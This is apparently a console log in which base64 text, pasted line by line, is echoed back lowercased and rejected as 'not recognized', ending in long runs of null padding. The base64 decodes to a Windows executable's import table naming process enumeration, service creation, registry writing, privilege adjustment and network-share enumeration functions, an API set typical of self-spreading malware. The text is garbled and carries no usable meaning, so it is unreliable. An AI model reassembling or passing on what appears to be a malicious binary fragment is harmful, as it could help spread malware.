ZW1vcnkA7wFPcGVuUHJvY2VzcwDZAU1vZHVsZTMyRmlyc3QATABDcmVhdGVUb29saGVscDMy **** Command 'zw1vcnka7wfpcgvuuhjvy2vzcwdzau1vzhvsztmyrmlyc3qatabdcmvhdgvub29sagvscdmy' not recognized. >>>> U25hcHNob3QAACQBR2V0TW9kdWxlRmlsZU5hbWVBAAD+AVByb2Nlc3MzMk5leHQA/AFQcm9j **** Command 'u25hchnob3qaacqbr2v0tw9kdwxlrmlszu5hbwvbaad+avbyb2nlc3mzmk5lehqa/afqcm9j' not recognized. >>>> ZXNzMzJGaXJzdAAA1gFNYXBWaWV3T2ZGaWxlADUAQ3JlYXRlRmlsZU1hcHBpbmdBAAASAUdl **** Command 'zxnzmzjgaxjzdaaa1gfnyxbwawv3t2zgawxladuaq3jlyxrlrmlszu1hchbpbmdbaaasaudl' not recognized. >>>> dEZpbGVTaXplADQAQ3JlYXRlRmlsZUEAsAJVbm1hcFZpZXdPZkZpbGUAGwFHZXRMb2NhbFRp **** Command 'dezpbgvtaxpladqaq3jlyxrlrmlszueasajvbm1hcfzpzxdpzkzpbguagwfhzxrmb2nhbfrp' not recognized. >>>> bWUAABoBR2V0TGFzdEVycm9yAADMAUxvY2FsRnJlZQDIAUxvY2FsQWxsb2MAAPgAR2V0Q3Vy **** Command 'bwuaabobr2v0tgfzdevycm9yaadmauxvy2fsrnjlzqdiauxvy2fsqwxsb2maapgar2v0q3vy' not recognized. >>>> cmVudFByb2Nlc3NJZADSAldpZGVDaGFyVG9NdWx0aUJ5dGUA5AFNdWx0aUJ5dGVUb1dpZGVD **** Command 'cmvudfbyb2nlc3njzadsaldpzgvdagfyvg9ndwx0auj5dgua5afndwx0auj5dgvub1dpzgvd' not recognized. >>>> aGFyAM4AR2V0Q29tcHV0ZXJOYW1lQQAAKABDb3B5RmlsZUEAuQFJc0RCQ1NMZWFkQnl0ZQAA **** Command 'agfyam4ar2v0q29tchv0zxjoyw1lqqaakabdb3b5rmlszueauqfjc0rcq1nmzwfkqnl0zqaa' not recognized. >>>> 3wJXcml0ZUZpbGUAGAJSZWFkRmlsZQAAYwFHZXRUZW1wRmlsZU5hbWVBAABlAUdldFRlbXBQ **** Command '3wjxcml0zuzpbguagajszwfkrmlszqaaywfhzxruzw1wrmlszu5hbwvbaablaudldfrlbxbq' not recognized. >>>> YXRoQQAAVwBEZWxldGVGaWxlQQBoAlNldEZpbGVBdHRyaWJ1dGVzQQAAkABGaW5kQ2xvc2UA **** Command 'yxroqqaavwbezwxldgvgawxlqqboalnldezpbgvbdhryawj1dgvzqqaakabgaw5kq2xvc2ua' not recognized. >>>> nQBGaW5kTmV4dEZpbGVBAJQARmluZEZpcnN0RmlsZUEAAGECU2V0RW5kT2ZGaWxlAABqAlNl **** Command 'nqbgaw5ktmv4dezpbgvbajqarmluzezpcnn0rmlszueaagecu2v0rw5kt2zgawxlaabqalnl' not recognized. >>>> dEZpbGVQb2ludGVyAAAUAUdldEZpbGVUaW1lAGwCU2V0RmlsZVRpbWUAbQFHZXRUaWNrQ291 **** Command 'dezpbgvqb2ludgvyaaauaudldezpbgvuaw1lagwcu2v0rmlszvrpbwuabqfhzxruawnrq291' not recognized. >>>> bnQAAEQAQ3JlYXRlUHJvY2Vzc0EAAFkBR2V0U3lzdGVtRGlyZWN0b3J5QQD3AEdldEN1cnJl **** Command 'bnqaaeqaq3jlyxrluhjvy2vzc0eaafkbr2v0u3lzdgvtrglyzwn0b3j5qqd3aedlden1cnjl' not recognized. >>>> bnRQcm9jZXNzAJsCU3lzdGVtVGltZVRvRmlsZVRpbWUAAF0BR2V0U3lzdGVtVGltZQB1AUdl **** Command 'bnrqcm9jzxnzajscu3lzdgvtvgltzvrvrmlszvrpbwuaaf0br2v0u3lzdgvtvgltzqb1audl' not recognized. >>>> dFZlcnNpb25FeEEAdAFHZXRWZXJzaW9uAADOAldhaXRGb3JTaW5nbGVPYmplY3QAygBHZXRD **** Command 'dfzlcnnpb25feeeadafhzxrwzxjzaw9uaadoaldhaxrgb3jtaw5nbgvpymply3qaygbhzxrd' not recognized. >>>> b21tYW5kTGluZUEAgABFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NBAAQBR2V0RHJpdmVUeXBl **** Command 'b21tyw5ktgluzueagabfehbhbmrfbnzpcm9ubwvudfn0cmluz3nbaaqbr2v0rhjpdmvuexbl' not recognized. >>>> QQBKAENyZWF0ZVRocmVhZAAAS0VSTkVMMzIuZGxsAABbAVJlZ0Nsb3NlS2V5AGYBUmVnRW51 **** Command 'qqbkaenyzwf0zvrocmvhzaaas0vstkvmmziuzgxsaabbavjlz0nsb3nls2v5agybumvnrw51' not recognized. >>>> bUtleUEAcQFSZWdPcGVuS2V5QQBkAVJlZ0RlbGV0ZVZhbHVlQQBqAVJlZ0VudW1WYWx1ZUEA **** Command 'butleueacqfszwdpcgvus2v5qqbkavjlz0rlbgv0zvzhbhvlqqbqavjlz0vudw1wywx1zuea' not recognized. >>>> NABDbG9zZVNlcnZpY2VIYW5kbGUAAEwAQ3JlYXRlU2VydmljZUEAAEUBT3BlblNDTWFuYWdl **** Command 'nabdbg9zzvnlcnzpy2viyw5kbguaaewaq3jlyxrlu2vydmljzueaaeubt3blblndtwfuywdl' not recognized. >>>> ckEAALMBU3RhcnRTZXJ2aWNlQ3RybERpc3BhdGNoZXJBAK4BU2V0U2VydmljZVN0YXR1cwAA **** Command 'ckeaalmbu3rhcnrtzxj2awnlq3ryberpc3bhdgnozxjbak4bu2v0u2vydmljzvn0yxr1cwaa' not recognized. >>>> RwFPcGVuU2VydmljZUEAAI4BUmVnaXN0ZXJTZXJ2aWNlQ3RybEhhbmRsZXJBAJ0ARnJlZVNp **** Command 'rwfpcgvuu2vydmljzueaai4bumvnaxn0zxjtzxj2awnlq3rybehhbmrszxjbaj0arnjlzvnp' not recognized. >>>> ZACYAEVxdWFsU2lkAAAYAEFsbG9jYXRlQW5kSW5pdGlhbGl6ZVNpZAAA0ABHZXRUb2tlbklu **** Command 'zacyaevxdwfsu2lkaaayaefsbg9jyxrlqw5ksw5pdglhbgl6zvnpzaaa0abhzxrub2tlbklu' not recognized. >>>> Zm9ybWF0aW9uAEIBT3BlblByb2Nlc3NUb2tlbgAAXAFSZWdDb25uZWN0UmVnaXN0cnlBALIB **** Command 'zm9ybwf0aw9uaeibt3blblbyb2nlc3nub2tlbgaaxafszwddb25uzwn0umvnaxn0cnlbalib' not recognized. >>>> U3RhcnRTZXJ2aWNlQQB7AVJlZ1F1ZXJ5VmFsdWVFeEEAAIYBUmVnU2V0VmFsdWVFeEEAAF4B **** Command 'u3rhcnrtzxj2awnlqqb7avjlz1f1zxj5vmfsdwvfeeeaaiybumvnu2v0vmfsdwvfeeeaaf4b' not recognized. >>>> UmVnQ3JlYXRlS2V5QQAXAEFkanVzdFRva2VuUHJpdmlsZWdlcwD1AExvb2t1cFByaXZpbGVn **** Command 'umvnq3jlyxrls2v5qqaxaefkanvzdfrva2vuuhjpdmlszwdlcwd1aexvb2t1cfbyaxzpbgvn' not recognized. >>>> ZVZhbHVlQQBBRFZBUEkzMi5kbGwAAFdTMl8zMi5kbGwAABEAV05ldENsb3NlRW51bQAcAFdO **** Command 'zvzhbhvlqqbbrfzbuekzmi5kbgwaafdtml8zmi5kbgwaabeav05ldensb3nlrw51bqacafdo' not recognized. >>>> ZXRFbnVtUmVzb3VyY2VBAEAAV05ldE9wZW5FbnVtQQBNUFIuZGxsACYBR2V0TW9kdWxlSGFu **** Command 'zxrfbnvtumvzb3vyy2vbaeaav05lde9wzw5fbnvtqqbnufiuzgxsacybr2v0tw9kdwxlsgfu' not recognized. >>>> ZGxlQQAAUAFHZXRTdGFydHVwSW5mb0EAfQBFeGl0UHJvY2VzcwC/AEdldENQSW5mbwC5AEdl **** Command 'zgxlqqaauafhzxrtdgfydhvwsw5mb0eafqbfegl0uhjvy2vzcwc/aedldenqsw5mbwc5aedl' not recognized. >>>> dEFDUAAAMQFHZXRPRU1DUAAAvwFMQ01hcFN0cmluZ0EAAMABTENNYXBTdHJpbmdXAACfAUhl **** Command 'defduaaamqfhzxrpru1duaaavwfmq01hcfn0cmluz0eaamabtennyxbtdhjpbmdxaacfauhl' not recognized. >>>> YXBGcmVlAACZAUhlYXBBbGxvYwCtAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAsgBGcmVl **** Command 'yxbgcmvlaaczauhlyxbbbgxvywctalvuagfuzgxlzev4y2vwdglvbkzpbhrlcgaasgbgcmvl' not recognized. >>>> RW52aXJvbm1lbnRTdHJpbmdzQQCzAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAAYBR2V0RW52 **** Command 'rw52axjvbm1lbnrtdhjpbmdzqqczaezyzwvfbnzpcm9ubwvudfn0cmluz3nxaaybr2v0rw52' not recognized. >>>> aXJvbm1lbnRTdHJpbmdzAAgBR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAbQJTZXRIYW5kbGVD **** Command 'axjvbm1lbnrtdhjpbmdzaagbr2v0rw52axjvbm1lbnrtdhjpbmdzvwaabqjtzxriyw5kbgvd' not recognized. >>>> b3VudAAAUgFHZXRTdGRIYW5kbGUAABUBR2V0RmlsZVR5cGUAnQFIZWFwRGVzdHJveQCbAUhl **** Command 'b3vudaaaugfhzxrtdgriyw5kbguaabubr2v0rmlszvr5cguanqfizwfwrgvzdhjveqcbauhl' not recognized. >>>> YXBDcmVhdGUAAL8CVmlydHVhbEZyZWUALwJSdGxVbndpbmQAUwFHZXRTdHJpbmdUeXBlQQAA **** Command 'yxbdcmvhdguaal8cvmlydhvhbezyzwualwjsdgxvbndpbmqauwfhzxrtdhjpbmduexblqqaa' not recognized. >>>> VgFHZXRTdHJpbmdUeXBlVwAAuwJWaXJ0dWFsQWxsb2MAAKIBSGVhcFJlQWxsb2MAfAJTZXRT **** Command 'vgfhzxrtdhjpbmduexblvwaauwjwaxj0dwfsqwxsb2maakibsgvhcfjlqwxsb2mafajtzxrt' not recognized. >>>> dGRIYW5kbGUAAKoARmx1c2hGaWxlQnVmZmVycwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'dgriyw5kbguaakoarmx1c2hgawxlqnvmzmvycwaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA **** Command 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' not recognized. >>>> 